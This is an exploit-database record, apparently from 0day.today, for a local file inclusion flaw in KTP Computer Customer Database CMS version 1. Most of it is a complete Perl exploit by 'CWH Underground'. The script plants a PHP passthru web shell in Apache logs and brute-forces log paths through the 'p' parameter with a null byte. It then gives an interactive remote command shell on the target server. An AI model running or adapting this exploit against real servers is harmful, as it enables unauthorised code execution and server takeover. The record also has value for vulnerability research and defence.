Description
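Exploit for a web application (target platform not specified): a Perl proof of concept for the local file inclusion vulnerability in KTP Computer Customer Database CMS version 1. According to the exploit's own notes it depends on magic_quotes_gpc = off, and it chains the inclusion through the "p" request parameter with web-server log files to reach remote command execution, so the practical impact is code execution on the server rather than file disclosure alone. The record lists no CVE and a CVSS score of 0.0 with vector NONE; this appears to reflect missing scoring data rather than low severity.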
{"id": "1337DAY-ID-4323", "type": "zdt", "bulletinFamily": "exploit", "title": "KTP Computer Customer Database CMS Local File Inclusion Vulnerability", "description": "Exploit for unknown platform in category web applications", "published": "2008-11-30T00:00:00", "modified": "2008-11-30T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/4323", "reporter": "CWH Underground", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-01-03T11:18:47", "viewCount": 6, "enchantments": {"score": {"value": -0.6, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.6}, "sourceHref": "https://0day.today/exploit/4323", "sourceData": "=====================================================================\r\nKTP Computer Customer Database CMS Local File Inclusion Vulnerability\r\n=====================================================================\r\n\r\n\r\n#!/usr/bin/perl -w\r\n#======================================\r\n# KTPCCD Local File Inclusion Exploit\r\n#======================================\r\n#\r\n# ,--^----------,--------,-----,-------^--,\r\n# | ||||||||| `--------' |\t O\t .. 
CWH Underground Hacking Team ..\r\n# `+---------------------------^----------|\r\n# `\\_,-------, _________________________|\r\n# / XXXXXX /`| /\r\n# / XXXXXX / `\\ /\r\n# / XXXXXX /\\______(\r\n# / XXXXXX / \r\n# / XXXXXX /\r\n# (________( \r\n# `------'\r\n#\r\n#AUTHOR : CWH Underground\r\n#DATE : 30 November 2008\r\n#\r\n#\r\n#####################################################\r\n#APPLICATION : KTP Computer Customer Database CMS\r\n#VERSION : 1\r\n#DOWNLOAD : http://downloads.sourceforge.net/ktpcomputercust/ktp_build_20081119.zip\r\n######################################################\r\n#Note: magic_quotes_gpc = off\r\n#Vulnerability in Local File Inclusion\r\n#Wrote Exploit for Local File Inclusion <-> Remote Command Execution\r\n#######################################################################################\r\n\r\n\r\nuse LWP::UserAgent;\r\nuse IO::Socket;\r\nuse LWP::Simple;\r\n\r\n$log=\"../\";\r\n@apache=(\r\n\"../../../../../var/log/httpd/access_log\",\r\n\"../../../../../var/log/httpd/error_log\",\r\n\"../apache/logs/error.log\",\r\n\"../apache/logs/access.log\",\r\n\"../../apache/logs/error.log\",\r\n\"../../apache/logs/access.log\",\r\n\"../../../apache/logs/error.log\",\r\n\"../../../apache/logs/access.log\",\r\n\"../../../../apache/logs/error.log\",\r\n\"../../../../apache/logs/access.log\",\r\n\"../../../../../apache/logs/error.log\",\r\n\"../../../../../apache/logs/access.log\",\r\n\"../logs/error.log\",\r\n\"../logs/access.log\",\r\n\"../../logs/error.log\",\r\n\"../../logs/access.log\",\r\n\"../../../logs/error.log\",\r\n\"../../../logs/access.log\",\r\n\"../../../../logs/error.log\",\r\n\"../../../../logs/access.log\",\r\n\"../../../../../logs/error.log\",\r\n\"../../../../../logs/access.log\",\r\n\"../../../../../etc/httpd/logs/access_log\",\r\n\"../../../../../etc/httpd/logs/access.log\",\r\n\"../../../../../etc/httpd/logs/error_log\",\r\n\"../../../../../etc/httpd/logs/error.log\",\r\n\"../../.. 
/../../var/www/logs/access_log\",\r\n\"../../../../../var/www/logs/access.log\",\r\n\"../../../../../usr/local/apache/logs/access_log\",\r\n\"../../../../../usr/local/apache/logs/access.log\",\r\n\"../../../../../var/log/apache/access_log\",\r\n\"../../../../../var/log/apache/access.log\",\r\n\"../../../../../var/log/access_log\",\r\n\"../../../../../var/www/logs/error_log\",\r\n\"../../../../../var/www/logs/error.log\",\r\n\"../../../../../usr/local/apache/logs/error_log\",\r\n\"../../../../../usr/local/apache/logs/error.log\",\r\n\"../../../../../var/log/apache/error_log\",\r\n\"../../../../../var/log/apache/error.log\",\r\n\"../../../../../var/log/access_log\",\r\n\"../../../../../var/log/error_log\"\r\n);\r\n\r\nmy $sis=\"$^O\";if ($sis eq 'MSWin32') { system(\"cls\"); } else { system(\"clear\"); }\r\n\r\nprint \"\\n==============================================\\n\";\r\nprint \" KTP Computer Customer Database \\n\";\r\nprint \" Remote Command Execution Exploit \\n\";\r\nprint \" Discovered By CWH Underground \\n\";\r\nprint \"==============================================\\n\";\r\nprint \" \\n\";\r\nprint \" ,--^----------,--------,-----,-------^--, \\n\";\r\nprint \" | ||||||||| `--------' | O \\n\";\r\nprint \" `+---------------------------^----------| \\n\";\r\nprint \" `\\_,-------, _________________________| \\n\";\r\nprint \" / XXXXXX /`| / \\n\";\r\nprint \" / XXXXXX / `\\ / \\n\";\r\nprint \" / XXXXXX /\\______( \\n\";\r\nprint \" / XXXXXX / \\n\";\r\nprint \" / XXXXXX / .. CWH Underground Hacking Team .. \\n\";\r\nprint \" (________( \\n\";\r\nprint \" `------' \\n\";\r\nprint \" \\n\";\r\n\r\n\r\n\r\nif (@ARGV < 2)\r\n{\r\n print \"Usage: ./xpl.pl <Host> <Path>\\n\";\r\n\tprint \"Ex. ./xpl.pl www.hackme.com /ktp\\n\";\r\n\r\n}\r\n\r\n$host=$ARGV[0];\r\n$path=$ARGV[1];\r\n\r\n\r\nif ( $host =~ /^http:/ ) {$host =~ s/http:\\/\\///g;}\r\n\r\nprint \"\\nTrying to Inject the Code...\\n\";\r\n\r\n$CODE=\"<? 
passthru(\\$_GET[cmd]) ?>\";\r\n$socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$host\", PeerPort=>\"80\") or die \"Could not connect to host.\\n\\n\";\r\nprint $socket \"GET /cwhunderground \".$CODE.\" HTTP/1.1\\r\\n\";\r\nprint $socket \"Host: \".$host.\"\\r\\n\";\r\nprint $socket \"Connection: close\\r\\n\\r\\n\";\r\nclose($socket);\r\n\r\nif ( $host !~ /^http:/ ) {$host = \"http://\" . $host;}\r\n\r\n foreach $getlog(@apache)\r\n {\r\n chomp($getlog);\r\n\t\t\t\t $find= $host.$path.\"/?p=\".$getlog.\"%00\";\r\n $xpl = LWP::UserAgent->new() or die \"Could not initialize browser\\n\";\r\n\t\t\t\t $req = HTTP::Request->new(GET => $find);\r\n\t\t\t\t $res = $xpl->request($req);\r\n\t\t\t\t $info = $res->content;\r\n if($info =~ /cwhunderground/)\r\n {print \"\\nSuccessfully injected in $getlog \\n\";$log=$getlog;}\r\n }\r\n\r\n\r\nmy $sis=\"$^O\";if ($sis eq 'MSWin32') { print \"\\n[cmd\\@win32]\\$ \"; } else { print \"\\n[cmd\\@unix]\\$ \"; }\r\n\r\nchomp( $cmd = <STDIN> );\r\n\r\nwhile($cmd !~ \"exit\") { \r\n \r\n\t\t\t\t $shell= $host.$path.\"/?p=\".$log.\"%00&cmd=$cmd\";\r\n $xpl = LWP::UserAgent->new() or die \"Could not initialize browser\\n\";\r\n\t\t\t\t $req = HTTP::Request->new(GET => $shell);\r\n\t\t\t\t $res = $xpl->request($req);\r\n\t\t\t\t $info = $res->content;\r\n\t\t\t\t print \"\\n$info\";\r\n\r\n \r\n my $sis=\"$^O\";if ($sis eq 'MSWin32') { print \"\\n[cmd\\@win32]\\$ \"; } else { print \"\\n[cmd\\@unix]\\$ \"; }\r\n chomp( $cmd = <STDIN> ); \r\n}\r\n\r\n\r\n\n# 0day.today [2018-01-03] #", "_state": {"dependencies": 1646823782, "score": 1659766679, "epss": 1678811959}}
{}